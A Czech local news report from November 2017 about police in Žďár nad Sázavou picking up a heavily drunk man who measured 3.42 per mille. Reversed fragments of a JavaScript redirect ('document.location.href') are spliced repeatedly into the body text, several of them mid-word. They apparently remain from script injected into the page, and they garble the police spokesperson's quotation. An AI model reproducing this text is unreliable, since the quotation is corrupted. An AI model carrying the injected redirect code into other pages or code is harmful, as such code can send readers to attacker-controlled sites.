Rainbow page separator

Opilec se dopoledne válel po ulici, nadýchal téměř 3,5 promile

Neděle, 26. listopadu 2017

Policejní auto

Žďár nad Sázavou / Muže, který vykazoval známky silné opilosti, „sbírali“ ve čtvrtek kolem půl jedenácté dopoledne policisté ve žďárské Zahradní ulici. Upozornil na něj telefonát na linku tísňového volání.
„Operační důs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tojník na udané mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to ihned vyslal policejní hlídku. Přivolaní policisté tam nalezli ležícího muže, který vykazoval známky značné opilosti a nebyl schopen samostatné chůze. Jednalo se o padesátiletého muže ze Žďárska, u kterého policisté provedli dechovou zkoušku. Výsledek byl pozitivní a jeho naměřená hodnota činila 3,42 promile alkoholu v dechu,“ informovala o případu policejní mluvčí Stanislava Miláčková.
Vzhledem k [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu, že silně podnapilý muž svým jednáním ohrožoval svůj život a zdraví, policisté ho zajistili a následně převezli do protialkoholní záchytné stanice k vystřízlivění.